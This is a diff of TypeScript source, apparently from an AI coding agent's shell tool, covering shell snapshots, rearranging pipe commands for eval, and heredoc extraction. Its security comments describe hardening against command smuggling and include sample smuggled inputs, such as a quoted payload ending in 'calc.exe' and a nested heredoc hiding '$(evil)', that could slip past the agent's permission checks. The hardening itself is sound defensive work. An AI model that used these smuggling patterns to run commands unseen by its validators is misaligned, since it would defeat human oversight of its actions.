logForDebugging(` - Claude home: ${getClaudeConfigHomeDir()}`)
|
||||
logForDebugging(`Full snapshot script:\n${snapshotScript}`)
|
||||
if (stdout) {
|
||||
logForDebugging(
|
||||
`stdout output (${stdout.length} chars):\n${stdout}`,
|
||||
)
|
||||
} else {
|
||||
logForDebugging(`No stdout output captured`)
|
||||
}
|
||||
if (stderr) {
|
||||
logForDebugging(
|
||||
`stderr output (${stderr.length} chars): ${stderr}`,
|
||||
)
|
||||
} else {
|
||||
logForDebugging(`No stderr output captured`)
|
||||
}
|
||||
logError(
|
||||
new Error(`Failed to create shell snapshot: ${error.message}`),
|
||||
)
|
||||
// Convert signal name to number if present
|
||||
const signalNumber = execError?.signal
|
||||
? os.constants.signals[
|
||||
execError.signal as keyof typeof os.constants.signals
|
||||
]
|
||||
: undefined
|
||||
logEvent('tengu_shell_snapshot_failed', {
|
||||
stderr_length: stderr?.length || 0,
|
||||
has_error_code: !!execError?.code,
|
||||
error_signal_number: signalNumber,
|
||||
error_killed: execError?.killed,
|
||||
})
|
||||
resolve(undefined)
|
||||
} else {
|
||||
let snapshotSize: number | undefined
|
||||
try {
|
||||
snapshotSize = (await stat(shellSnapshotPath)).size
|
||||
} catch {
|
||||
// Snapshot file not found
|
||||
}
|
||||
|
||||
if (snapshotSize !== undefined) {
|
||||
logForDebugging(
|
||||
`Shell snapshot created successfully (${snapshotSize} bytes)`,
|
||||
)
|
||||
|
||||
// Register cleanup to remove snapshot on graceful shutdown
|
||||
registerCleanup(async () => {
|
||||
try {
|
||||
await getFsImplementation().unlink(shellSnapshotPath)
|
||||
logForDebugging(
|
||||
`Cleaned up session snapshot: ${shellSnapshotPath}`,
|
||||
)
|
||||
} catch (error) {
|
||||
logForDebugging(
|
||||
`Error cleaning up session snapshot: ${error}`,
|
||||
)
|
||||
}
|
||||
})
|
||||
|
||||
resolve(shellSnapshotPath)
|
||||
} else {
|
||||
logForDebugging(
|
||||
`Shell snapshot file not found after creation: ${shellSnapshotPath}`,
|
||||
)
|
||||
logForDebugging(
|
||||
`Checking if parent directory still exists: ${snapshotsDir}`,
|
||||
)
|
||||
try {
|
||||
const dirContents =
|
||||
await getFsImplementation().readdir(snapshotsDir)
|
||||
logForDebugging(
|
||||
`Directory contains ${dirContents.length} files`,
|
||||
)
|
||||
} catch {
|
||||
logForDebugging(
|
||||
`Parent directory does not exist or is not accessible: ${snapshotsDir}`,
|
||||
)
|
||||
}
|
||||
logEvent('tengu_shell_unknown_error', {})
|
||||
resolve(undefined)
|
||||
}
|
||||
}
|
||||
},
|
||||
)
|
||||
} catch (error) {
|
||||
logForDebugging(`Unexpected error during snapshot creation: ${error}`)
|
||||
if (error instanceof Error) {
|
||||
logForDebugging(`Error stack trace: ${error.stack}`)
|
||||
}
|
||||
logError(error)
|
||||
logEvent('tengu_shell_snapshot_error', {})
|
||||
resolve(undefined)
|
||||
}
|
||||
})
|
||||
}
|
||||
+2679
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,294 @@
|
||||
import {
|
||||
hasMalformedTokens,
|
||||
hasShellQuoteSingleQuoteBug,
|
||||
type ParseEntry,
|
||||
quote,
|
||||
tryParseShellCommand,
|
||||
} from './shellQuote.js'
|
||||
|
||||
/**
|
||||
* Rearranges a command with pipes to place stdin redirect after the first command.
|
||||
* This fixes an issue where eval treats the entire piped command as a single unit,
|
||||
* causing the stdin redirect to apply to eval itself rather than the first command.
|
||||
*/
|
||||
export function rearrangePipeCommand(command: string): string {
|
||||
// Skip if command has backticks - shell-quote doesn't handle them well
|
||||
if (command.includes('`')) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
// Skip if command has command substitution - shell-quote parses $() incorrectly,
|
||||
// treating ( and ) as separate operators instead of recognizing command substitution
|
||||
if (command.includes('$(')) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
// Skip if command references shell variables ($VAR, ${VAR}). shell-quote's parse()
|
||||
// expands these to empty string when no env is passed, silently dropping the
|
||||
// reference. Even if we preserved the token via an env function, quote() would
|
||||
// then escape the $ during rebuild, preventing runtime expansion. See #9732.
|
||||
if (/\$[A-Za-z_{]/.test(command)) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
// Skip if command contains bash control structures (for/while/until/if/case/select)
|
||||
// shell-quote cannot parse these correctly and will incorrectly find pipes inside
|
||||
// the control structure body, breaking the command when rearranged
|
||||
if (containsControlStructure(command)) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
// Join continuation lines before parsing: shell-quote doesn't handle \<newline>
|
||||
// and produces empty string tokens for each occurrence, causing spurious empty
|
||||
// arguments in the reconstructed command
|
||||
const joined = joinContinuationLines(command)
|
||||
|
||||
// shell-quote treats bare newlines as whitespace, not command separators.
|
||||
// Parsing+rebuilding 'cmd1 | head\ncmd2 | grep' yields 'cmd1 | head cmd2 | grep',
|
||||
// silently merging pipelines. Line-continuation (\<newline>) is already stripped
|
||||
// above; any remaining newline is a real separator. Bail to the eval fallback,
|
||||
// which preserves the newline inside a single-quoted arg. See #32515.
|
||||
if (joined.includes('\n')) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
// SECURITY: shell-quote treats \' inside single quotes as an escape, but
|
||||
// bash treats it as literal \ followed by a closing quote. The pattern
|
||||
// '\' <payload> '\' makes shell-quote merge <payload> into the quoted
|
||||
// string, hiding operators like ; from the token stream. Rebuilding from
|
||||
// that merged token can expose the operators when bash re-parses.
|
||||
if (hasShellQuoteSingleQuoteBug(joined)) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
const parseResult = tryParseShellCommand(joined)
|
||||
|
||||
// If parsing fails (malformed syntax), fall back to quoting the whole command
|
||||
if (!parseResult.success) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
const parsed = parseResult.tokens
|
||||
|
||||
// SECURITY: shell-quote tokenizes differently from bash. Input like
|
||||
// `echo {"hi":\"hi;calc.exe"}` is a bash syntax error (unbalanced quote),
|
||||
// but shell-quote parses it into tokens with `;` as an operator and
|
||||
// `calc.exe` as a separate word. Rebuilding from those tokens produces
|
||||
// valid bash that executes `calc.exe` — turning a syntax error into an
|
||||
// injection. Unbalanced delimiters in a string token signal this
|
||||
// misparsing; fall back to whole-command quoting, which preserves the
|
||||
// original (bash then rejects it with the same syntax error it would have
|
||||
// raised without us).
|
||||
if (hasMalformedTokens(joined, parsed)) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
const firstPipeIndex = findFirstPipeOperator(parsed)
|
||||
|
||||
if (firstPipeIndex <= 0) {
|
||||
return quoteWithEvalStdinRedirect(command)
|
||||
}
|
||||
|
||||
// Rebuild: first_command < /dev/null | rest_of_pipeline
|
||||
const parts = [
|
||||
...buildCommandParts(parsed, 0, firstPipeIndex),
|
||||
'< /dev/null',
|
||||
...buildCommandParts(parsed, firstPipeIndex, parsed.length),
|
||||
]
|
||||
|
||||
return singleQuoteForEval(parts.join(' '))
|
||||
}
|
||||
|
||||
/**
|
||||
* Finds the index of the first pipe operator in parsed shell command
|
||||
*/
|
||||
function findFirstPipeOperator(parsed: ParseEntry[]): number {
|
||||
for (let i = 0; i < parsed.length; i++) {
|
||||
const entry = parsed[i]
|
||||
if (isOperator(entry, '|')) {
|
||||
return i
|
||||
}
|
||||
}
|
||||
return -1
|
||||
}
|
||||
|
||||
/**
|
||||
* Builds command parts from parsed entries, handling strings and operators.
|
||||
* Special handling for file descriptor redirections to preserve them as single units.
|
||||
*/
|
||||
function buildCommandParts(
|
||||
parsed: ParseEntry[],
|
||||
start: number,
|
||||
end: number,
|
||||
): string[] {
|
||||
const parts: string[] = []
|
||||
// Track if we've seen a non-env-var string token yet
|
||||
// Environment variables are only valid at the start of a command
|
||||
let seenNonEnvVar = false
|
||||
|
||||
for (let i = start; i < end; i++) {
|
||||
const entry = parsed[i]
|
||||
|
||||
// Check for file descriptor redirections (e.g., 2>&1, 2>/dev/null)
|
||||
if (
|
||||
typeof entry === 'string' &&
|
||||
/^[012]$/.test(entry) &&
|
||||
i + 2 < end &&
|
||||
isOperator(parsed[i + 1])
|
||||
) {
|
||||
const op = parsed[i + 1] as { op: string }
|
||||
const target = parsed[i + 2]
|
||||
|
||||
// Handle 2>&1 style redirections
|
||||
if (
|
||||
op.op === '>&' &&
|
||||
typeof target === 'string' &&
|
||||
/^[012]$/.test(target)
|
||||
) {
|
||||
parts.push(`${entry}>&${target}`)
|
||||
i += 2
|
||||
continue
|
||||
}
|
||||
|
||||
// Handle 2>/dev/null style redirections
|
||||
if (op.op === '>' && target === '/dev/null') {
|
||||
parts.push(`${entry}>/dev/null`)
|
||||
i += 2
|
||||
continue
|
||||
}
|
||||
|
||||
// Handle 2> &1 style (space between > and &1)
|
||||
if (
|
||||
op.op === '>' &&
|
||||
typeof target === 'string' &&
|
||||
target.startsWith('&')
|
||||
) {
|
||||
const fd = target.slice(1)
|
||||
if (/^[012]$/.test(fd)) {
|
||||
parts.push(`${entry}>&${fd}`)
|
||||
i += 2
|
||||
continue
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Handle regular entries
|
||||
if (typeof entry === 'string') {
|
||||
// Environment variable assignments are only valid at the start of a command,
|
||||
// before any non-env-var tokens (the actual command and its arguments)
|
||||
const isEnvVar = !seenNonEnvVar && isEnvironmentVariableAssignment(entry)
|
||||
|
||||
if (isEnvVar) {
|
||||
// For env var assignments, we need to preserve the = but quote the value if needed
|
||||
// Split into name and value parts
|
||||
const eqIndex = entry.indexOf('=')
|
||||
const name = entry.slice(0, eqIndex)
|
||||
const value = entry.slice(eqIndex + 1)
|
||||
|
||||
// Quote the value part to handle spaces and special characters
|
||||
const quotedValue = quote([value])
|
||||
parts.push(`${name}=${quotedValue}`)
|
||||
} else {
|
||||
// Once we see a non-env-var string, all subsequent strings are arguments
|
||||
seenNonEnvVar = true
|
||||
parts.push(quote([entry]))
|
||||
}
|
||||
} else if (isOperator(entry)) {
|
||||
// Special handling for glob operators
|
||||
if (entry.op === 'glob' && 'pattern' in entry) {
|
||||
// Don't quote glob patterns - they need to remain as-is for shell expansion
|
||||
parts.push(entry.pattern as string)
|
||||
} else {
|
||||
parts.push(entry.op)
|
||||
// Reset after command separators - the next command can have its own env vars
|
||||
if (isCommandSeparator(entry.op)) {
|
||||
seenNonEnvVar = false
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return parts
|
||||
}
|
||||
|
||||
/**
|
||||
* Checks if a string is an environment variable assignment (VAR=value)
|
||||
* Environment variable names must start with letter or underscore,
|
||||
* followed by letters, numbers, or underscores
|
||||
*/
|
||||
function isEnvironmentVariableAssignment(str: string): boolean {
|
||||
return /^[A-Za-z_][A-Za-z0-9_]*=/.test(str)
|
||||
}
|
||||
|
||||
/**
|
||||
* Checks if an operator is a command separator that starts a new command context.
|
||||
* After these operators, environment variable assignments are valid again.
|
||||
*/
|
||||
function isCommandSeparator(op: string): boolean {
|
||||
return op === '&&' || op === '||' || op === ';'
|
||||
}
|
||||
|
||||
/**
|
||||
* Type guard to check if a parsed entry is an operator
|
||||
*/
|
||||
function isOperator(entry: unknown, op?: string): entry is { op: string } {
|
||||
if (!entry || typeof entry !== 'object' || !('op' in entry)) {
|
||||
return false
|
||||
}
|
||||
return op ? entry.op === op : true
|
||||
}
|
||||
|
||||
/**
|
||||
* Checks if a command contains bash control structures that shell-quote cannot parse.
|
||||
* These include for/while/until/if/case/select loops and conditionals.
|
||||
* We match keywords followed by whitespace to avoid false positives with commands
|
||||
* or arguments that happen to contain these words.
|
||||
*/
|
||||
function containsControlStructure(command: string): boolean {
|
||||
return /\b(for|while|until|if|case|select)\s/.test(command)
|
||||
}
|
||||
|
||||
/**
|
||||
* Quotes a command and adds `< /dev/null` as a shell redirect on eval, rather than
|
||||
* as an eval argument. This is critical for pipe commands where we can't parse the
|
||||
* pipe boundary (e.g., commands with $(), backticks, or control structures).
|
||||
*
|
||||
* Using `singleQuoteForEval(cmd) + ' < /dev/null'` produces: eval 'cmd' < /dev/null
|
||||
* → eval's stdin is /dev/null, eval evaluates 'cmd', pipes inside work correctly
|
||||
*
|
||||
* The previous approach `quote([cmd, '<', '/dev/null'])` produced: eval 'cmd' \< /dev/null
|
||||
* → eval concatenates args to 'cmd < /dev/null', redirect applies to LAST pipe command
|
||||
*/
|
||||
function quoteWithEvalStdinRedirect(command: string): string {
|
||||
return singleQuoteForEval(command) + ' < /dev/null'
|
||||
}
|
||||
|
||||
/**
|
||||
* Single-quote a string for use as an eval argument. Escapes embedded single
|
||||
* quotes via '"'"' (close-sq, literal-sq-in-dq, reopen-sq). Used instead of
|
||||
* shell-quote's quote() which switches to double-quote mode when the input
|
||||
* contains single quotes and then escapes ! -> \!, corrupting jq/awk filters
|
||||
* like `select(.x != .y)` into `select(.x \!= .y)`.
|
||||
*/
|
||||
function singleQuoteForEval(s: string): string {
|
||||
return "'" + s.replace(/'/g, `'"'"'`) + "'"
|
||||
}
|
||||
|
||||
/**
|
||||
* Joins shell continuation lines (backslash-newline) into a single line.
|
||||
* Only joins when there's an odd number of backslashes before the newline
|
||||
* (the last one escapes the newline). Even backslashes pair up as escape
|
||||
* sequences and the newline remains a separator.
|
||||
*/
|
||||
function joinContinuationLines(command: string): string {
|
||||
return command.replace(/\\+\n/g, match => {
|
||||
const backslashCount = match.length - 1 // -1 for the newline
|
||||
if (backslashCount % 2 === 1) {
|
||||
// Odd number: last backslash escapes the newline (line continuation)
|
||||
return '\\'.repeat(backslashCount - 1)
|
||||
} else {
|
||||
// Even number: all pair up, newline is a real separator
|
||||
return match
|
||||
}
|
||||
})
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,733 @@
|
||||
/**
|
||||
* Heredoc extraction and restoration utilities.
|
||||
*
|
||||
* The shell-quote library parses `<<` as two separate `<` redirect operators,
|
||||
* which breaks command splitting for heredoc syntax. This module provides
|
||||
* utilities to extract heredocs before parsing and restore them after.
|
||||
*
|
||||
* Supported heredoc variations:
|
||||
* - <<WORD - basic heredoc
|
||||
* - <<'WORD' - single-quoted delimiter (no variable expansion in content)
|
||||
* - <<"WORD" - double-quoted delimiter (with variable expansion)
|
||||
* - <<-WORD - dash prefix (strips leading tabs from content)
|
||||
* - <<-'WORD' - combined dash and quoted delimiter
|
||||
*
|
||||
* Known limitations:
|
||||
* - Heredocs inside backtick command substitution may not be extracted
|
||||
* - Very complex multi-heredoc scenarios may not be extracted
|
||||
*
|
||||
* When extraction fails, the command passes through unchanged. This is safe
|
||||
* because the unextracted heredoc will either cause shell-quote parsing to fail
|
||||
* (falling back to treating the whole command as one unit) or require manual
|
||||
* approval for each apparent subcommand.
|
||||
*
|
||||
* @module
|
||||
*/
|
||||
|
||||
import { randomBytes } from 'crypto'
|
||||
|
||||
const HEREDOC_PLACEHOLDER_PREFIX = '__HEREDOC_'
|
||||
const HEREDOC_PLACEHOLDER_SUFFIX = '__'
|
||||
|
||||
/**
|
||||
* Generates a random hex string for placeholder uniqueness.
|
||||
* This prevents collision when command text literally contains "__HEREDOC_N__".
|
||||
*/
|
||||
function generatePlaceholderSalt(): string {
|
||||
// Generate 8 random bytes as hex (16 characters)
|
||||
return randomBytes(8).toString('hex')
|
||||
}
|
||||
|
||||
/**
|
||||
* Regex pattern for matching heredoc start syntax.
|
||||
*
|
||||
* Two alternatives handle quoted vs unquoted delimiters differently:
|
||||
*
|
||||
* Alternative 1 (quoted): (['"]) (\\?\w+) \2
|
||||
* Captures the opening quote, then the delimiter word (which MAY include a
|
||||
* leading backslash since it's literal inside quotes), then the closing quote.
|
||||
* In bash, single quotes make EVERYTHING literal including backslashes:
|
||||
* <<'\EOF' → delimiter is \EOF (with backslash)
|
||||
* <<'EOF' → delimiter is EOF
|
||||
* Double quotes also preserve backslashes before non-special chars:
|
||||
* <<"\EOF" → delimiter is \EOF
|
||||
*
|
||||
* Alternative 2 (unquoted): \\?(\w+)
|
||||
* Optionally consumes a leading backslash (escape), then captures the word.
|
||||
* In bash, an unquoted backslash escapes the next character:
|
||||
* <<\EOF → delimiter is EOF (backslash consumed as escape)
|
||||
* <<EOF → delimiter is EOF (plain)
|
||||
*
|
||||
* SECURITY: The backslash MUST be inside the capture group for quoted
|
||||
* delimiters but OUTSIDE for unquoted ones. The old regex had \\? outside
|
||||
* the capture group unconditionally, causing <<'\EOF' to extract delimiter
|
||||
* "EOF" while bash uses "\EOF", allowing command smuggling.
|
||||
*
|
||||
* Note: Uses [ \t]* (not \s*) to avoid matching across newlines, which would be
|
||||
* a security issue (could hide commands between << and the delimiter).
|
||||
*/
|
||||
const HEREDOC_START_PATTERN =
|
||||
// eslint-disable-next-line custom-rules/no-lookbehind-regex -- gated by command.includes('<<') at extractHeredocs() entry
|
||||
/(?<!<)<<(?!<)(-)?[ \t]*(?:(['"])(\\?\w+)\2|\\?(\w+))/
|
||||
|
||||
export type HeredocInfo = {
|
||||
/** The full heredoc text including << operator, delimiter, content, and closing delimiter */
|
||||
fullText: string
|
||||
/** The delimiter word (without quotes) */
|
||||
delimiter: string
|
||||
/** Start position of the << operator in the original command */
|
||||
operatorStartIndex: number
|
||||
/** End position of the << operator (exclusive) - content on same line after this is preserved */
|
||||
operatorEndIndex: number
|
||||
/** Start position of heredoc content (the newline before content) */
|
||||
contentStartIndex: number
|
||||
/** End position of heredoc content including closing delimiter (exclusive) */
|
||||
contentEndIndex: number
|
||||
}
|
||||
|
||||
export type HeredocExtractionResult = {
|
||||
/** The command with heredocs replaced by placeholders */
|
||||
processedCommand: string
|
||||
/** Map of placeholder string to original heredoc info */
|
||||
heredocs: Map<string, HeredocInfo>
|
||||
}
|
||||
|
||||
/**
|
||||
* Extracts heredocs from a command string and replaces them with placeholders.
|
||||
*
|
||||
* This allows shell-quote to parse the command without mangling heredoc syntax.
|
||||
* After parsing, use `restoreHeredocs` to replace placeholders with original content.
|
||||
*
|
||||
* @param command - The shell command string potentially containing heredocs
|
||||
* @returns Object containing the processed command and a map of placeholders to heredoc info
|
||||
*
|
||||
* @example
|
||||
* ```ts
|
||||
* const result = extractHeredocs(`cat <<EOF
|
||||
* hello world
|
||||
* EOF`);
|
||||
* // result.processedCommand === "cat __HEREDOC_0_a1b2c3d4__" (salt varies)
|
||||
* // result.heredocs has the mapping to restore later
|
||||
* ```
|
||||
*/
|
||||
export function extractHeredocs(
|
||||
command: string,
|
||||
options?: { quotedOnly?: boolean },
|
||||
): HeredocExtractionResult {
|
||||
const heredocs = new Map<string, HeredocInfo>()
|
||||
|
||||
// Quick check: if no << present, skip processing
|
||||
if (!command.includes('<<')) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Security: Paranoid pre-validation. Our incremental quote/comment scanner
|
||||
// (see advanceScan below) does simplified parsing that cannot handle all
|
||||
// bash quoting constructs. If the command contains
|
||||
// constructs that could desync our quote tracking, bail out entirely
|
||||
// rather than risk extracting a heredoc with incorrect boundaries.
|
||||
// This is defense-in-depth: each construct below has caused or could
|
||||
// cause a security bypass if we attempt extraction.
|
||||
//
|
||||
// Specifically, we bail if the command contains:
|
||||
// 1. $'...' or $"..." (ANSI-C / locale quoting — our quote tracker
|
||||
// doesn't handle the $ prefix, would misparse the quotes)
|
||||
// 2. Backtick command substitution (backtick nesting has complex parsing
|
||||
// rules, and backtick acts as shell_eof_token for PST_EOFTOKEN in
|
||||
// make_cmd.c:606, enabling early heredoc closure that our parser
|
||||
// can't replicate)
|
||||
if (/\$['"]/.test(command)) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
// Check for backticks in the command text before the first <<.
|
||||
// Backtick nesting has complex parsing rules, and backtick acts as
|
||||
// shell_eof_token for PST_EOFTOKEN (make_cmd.c:606), enabling early
|
||||
// heredoc closure that our parser can't replicate. We only check
|
||||
// before << because backticks in heredoc body content are harmless.
|
||||
const firstHeredocPos = command.indexOf('<<')
|
||||
if (firstHeredocPos > 0 && command.slice(0, firstHeredocPos).includes('`')) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
|
||||
// Security: Check for arithmetic evaluation context before the first `<<`.
|
||||
// In bash, `(( x = 1 << 2 ))` uses `<<` as a BIT-SHIFT operator, not a
|
||||
// heredoc. If we mis-extract it, subsequent lines become "heredoc content"
|
||||
// and are hidden from security validators, while bash executes them as
|
||||
// separate commands. We bail entirely if `((` appears before `<<` without
|
||||
// a matching `))` — we can't reliably distinguish arithmetic `<<` from
|
||||
// heredoc `<<` in that context. Note: $(( is already caught by
|
||||
// validateDangerousPatterns, but bare (( is not.
|
||||
if (firstHeredocPos > 0) {
|
||||
const beforeHeredoc = command.slice(0, firstHeredocPos)
|
||||
// Count (( and )) occurrences — if unbalanced, `<<` may be arithmetic
|
||||
const openArith = (beforeHeredoc.match(/\(\(/g) || []).length
|
||||
const closeArith = (beforeHeredoc.match(/\)\)/g) || []).length
|
||||
if (openArith > closeArith) {
|
||||
return { processedCommand: command, heredocs }
|
||||
}
|
||||
}
|
||||
|
||||
// Create a global version of the pattern for iteration
|
||||
const heredocStartPattern = new RegExp(HEREDOC_START_PATTERN.source, 'g')
|
||||
|
||||
const heredocMatches: HeredocInfo[] = []
|
||||
// Security: When quotedOnly skips an unquoted heredoc, we still need to
|
||||
// track its content range so the nesting filter can reject quoted heredocs
|
||||
// that appear INSIDE the skipped unquoted heredoc's body. Without this,
|
||||
// `cat <<EOF\n<<'SAFE'\n$(evil)\nSAFE\nEOF` would extract <<'SAFE' as a
|
||||
// top-level heredoc, hiding $(evil) from validators — even though in bash,
|
||||
// $(evil) IS executed (unquoted <<EOF expands its body).
|
||||
const skippedHeredocRanges: Array<{
|
||||
contentStartIndex: number
|
||||
contentEndIndex: number
|
||||
}> = []
|
||||
let match: RegExpExecArray | null
|
||||
|
||||
// Incremental quote/comment scanner state.
|
||||
//
|
||||
// The regex walks forward through the command, and match.index is monotonically
|
||||
// increasing. Previously, isInsideQuotedString and isInsideComment each
|
||||
// re-scanned from position 0 on every match — O(n²) when the heredoc body
|
||||
// contains many `<<` (e.g. C++ with `std::cout << ...`). A 200-line C++
|
||||
// heredoc hit ~3.7ms per extractHeredocs call, and Bash security validation
|
||||
// calls extractHeredocs multiple times per command.
|
||||
//
|
||||
// Instead, track quote/comment/escape state incrementally and advance from
|
||||
// the last scanned position. This preserves the OLD helpers' exact semantics:
|
||||
//
|
||||
// Quote state (was isInsideQuotedString) is COMMENT-BLIND — it never sees
|
||||
// `#` and never skips characters for being "in a comment". Inside single
|
||||
// quotes, everything is literal. Inside double quotes, backslash escapes
|
||||
// the next char. An unquoted backslash run of odd length escapes the next
|
||||
// char.
|
||||
//
|
||||
// Comment state (was isInsideComment) observes quote state (# inside quotes
|
||||
// is not a comment) but NOT the reverse. The old helper used a per-call
|
||||
// `lineStart = lastIndexOf('\n', pos-1)+1` bound on which `#` to consider;
|
||||
// equivalently, any physical `\n` clears comment state — including `\n`
|
||||
// inside quotes (since lastIndexOf was quote-blind).
|
||||
//
|
||||
// SECURITY: Do NOT let comment mode suppress quote-state updates. If `#` put
|
||||
// the scanner in a mode that skipped quote chars, then `echo x#"\n<<...`
|
||||
// (where bash treats `#` as part of the word `x#`, NOT a comment) would
|
||||
// report the `<<` as unquoted and EXTRACT it — hiding content from security
|
||||
// validators. The old isInsideQuotedString was comment-blind; we preserve
|
||||
// that. Both old and new over-eagerly treat any unquoted `#` as a comment
|
||||
// (bash requires word-start), but since quote tracking is independent, the
|
||||
// over-eagerness only affects the comment check — causing SKIPS (safe
|
||||
// direction), never extra EXTRACTIONS.
|
||||
let scanPos = 0
|
||||
let scanInSingleQuote = false
|
||||
let scanInDoubleQuote = false
|
||||
let scanInComment = false
|
||||
// Inside "...": true if the previous char was a backslash (next char is escaped).
|
||||
// Carried across advanceScan calls so a `\` at scanPos-1 correctly escapes
|
||||
// the char at scanPos.
|
||||
let scanDqEscapeNext = false
|
||||
// Unquoted context: length of the consecutive backslash run ending at scanPos-1.
|
||||
// Used to determine if the char at scanPos is escaped (odd run = escaped).
|
||||
let scanPendingBackslashes = 0
|
||||
|
||||
const advanceScan = (target: number): void => {
|
||||
for (let i = scanPos; i < target; i++) {
|
||||
const ch = command[i]!
|
||||
|
||||
// Any physical newline clears comment state. The old isInsideComment
|
||||
// used `lineStart = lastIndexOf('\n', pos-1)+1` (quote-blind), so a
|
||||
// `\n` inside quotes still advanced lineStart. Match that here by
|
||||
// clearing BEFORE the quote branches.
|
||||
if (ch === '\n') scanInComment = false
|
||||
|
||||
if (scanInSingleQuote) {
|
||||
if (ch === "'") scanInSingleQuote = false
|
||||
continue
|
||||
}
|
||||
|
||||
if (scanInDoubleQuote) {
|
||||
if (scanDqEscapeNext) {
|
||||
scanDqEscapeNext = false
|
||||
continue
|
||||
}
|
||||
if (ch === '\\') {
|
||||
scanDqEscapeNext = true
|
||||
continue
|
||||
}
|
||||
if (ch === '"') scanInDoubleQuote = false
|
||||
continue
|
||||
}
|
||||
|
||||
// Unquoted context. Quote tracking is COMMENT-BLIND (same as the old
|
||||
// isInsideQuotedString): we do NOT skip chars for being inside a
|
||||
// comment. Only the `#` detection itself is gated on not-in-comment.
|
||||
if (ch === '\\') {
|
||||
scanPendingBackslashes++
|
||||
continue
|
||||
}
|
||||
const escaped = scanPendingBackslashes % 2 === 1
|
||||
scanPendingBackslashes = 0
|
||||
if (escaped) continue
|
||||
|
||||
if (ch === "'") scanInSingleQuote = true
|
||||
else if (ch === '"') scanInDoubleQuote = true
|
||||
else if (!scanInComment && ch === '#') scanInComment = true
|
||||
}
|
||||
scanPos = target
|
||||
}
|
||||
|
||||
while ((match = heredocStartPattern.exec(command)) !== null) {
|
||||
const startIndex = match.index
|
||||
|
||||
// Advance the incremental scanner to this match's position. After this,
|
||||
// scanInSingleQuote/scanInDoubleQuote/scanInComment reflect the parser
|
||||
// state immediately BEFORE startIndex, and scanPendingBackslashes is the
|
||||
// count of unquoted `\` immediately preceding startIndex.
|
||||
advanceScan(startIndex)
|
||||
|
||||
// Skip if this << is inside a quoted string (not a real heredoc operator).
|
||||
if (scanInSingleQuote || scanInDoubleQuote) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Skip if this << is inside a comment (after unquoted #).
|
||||
// In bash, `# <<EOF` is a comment — extracting it would hide commands on
|
||||
// subsequent lines as "heredoc content" while bash executes them.
|
||||
if (scanInComment) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Skip if this << is preceded by an odd number of backslashes.
|
||||
// In bash, `\<<EOF` is NOT a heredoc — `\<` is a literal `<`, then `<EOF`
|
||||
// is input redirection. Extracting it would drop same-line commands from
|
||||
// security checks. The scanner tracks the unquoted backslash run ending
|
||||
// immediately before startIndex (scanPendingBackslashes).
|
||||
if (scanPendingBackslashes % 2 === 1) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Bail if this `<<` falls inside the body of a previously
|
||||
// SKIPPED heredoc (unquoted heredoc in quotedOnly mode). In bash,
|
||||
// `<<` inside a heredoc body is just text — it's not a nested heredoc
|
||||
// operator. Extracting it would hide content that bash actually expands.
|
||||
let insideSkipped = false
|
||||
for (const skipped of skippedHeredocRanges) {
|
||||
if (
|
||||
startIndex > skipped.contentStartIndex &&
|
||||
startIndex < skipped.contentEndIndex
|
||||
) {
|
||||
insideSkipped = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if (insideSkipped) {
|
||||
continue
|
||||
}
|
||||
|
||||
const fullMatch = match[0]
|
||||
const isDash = match[1] === '-'
|
||||
// Group 3 = quoted delimiter (may include backslash), group 4 = unquoted
|
||||
const delimiter = (match[3] || match[4])!
|
||||
const operatorEndIndex = startIndex + fullMatch.length
|
||||
|
||||
// Security: Two checks to verify our regex captured the full delimiter word.
|
||||
// Any mismatch between our parsed delimiter and bash's actual delimiter
|
||||
// could allow command smuggling past permission checks.
|
||||
|
||||
// Check 1: If a quote was captured (group 2), verify the closing quote
|
||||
// was actually matched by \2 in the regex (the quoted alternative requires
|
||||
// the closing quote). The regex's \w+ only matches [a-zA-Z0-9_], so
|
||||
// non-word chars inside quotes (spaces, hyphens, dots) cause \w+ to stop
|
||||
// early, leaving the closing quote unmatched.
|
||||
// Example: <<"EO F" — regex captures "EO", misses closing ", delimiter
|
||||
// should be "EO F" but we'd use "EO". Skip to prevent mismatch.
|
||||
const quoteChar = match[2]
|
||||
if (quoteChar && command[operatorEndIndex - 1] !== quoteChar) {
|
||||
continue
|
||||
}
|
||||
|
||||
// Security: Determine if the delimiter is quoted ('EOF', "EOF") or
|
||||
// escaped (\EOF). In bash, quoted/escaped delimiters suppress all
|
||||
// expansion in the heredoc body — content is literal text. Unquoted
|
||||
// delimiters (<<EOF) perform full shell expansion: $(), backticks,
|
||||
// and ${} in the body ARE executed. When quotedOnly is set, skip
|
||||
// unquoted heredocs so their bodies remain visible to security
|
||||
// validators (they may contain executable command substitutions).
|
||||
const isEscapedDelimiter = fullMatch.includes('\\')
|
||||
const isQuotedOrEscaped = !!quoteChar || isEscapedDelimiter
|
||||
// Note: We do NOT skip unquoted heredocs here anymore when quotedOnly is
|
||||
// set. Instead, we compute their content range and add them to
|
||||
// skippedHeredocRanges, then skip them AFTER finding the closing
|
||||
// delimiter. This lets the nesting filter correctly reject quoted
|
||||
// "heredocs" that appear inside unquoted heredoc bodies.
|
||||
|
||||
// Check 2: Verify the next character after our match is a bash word
|
||||
// terminator (metacharacter or end of string). Characters like word chars,
|
||||
// quotes, $, \ mean the bash word extends beyond our match
|
||||
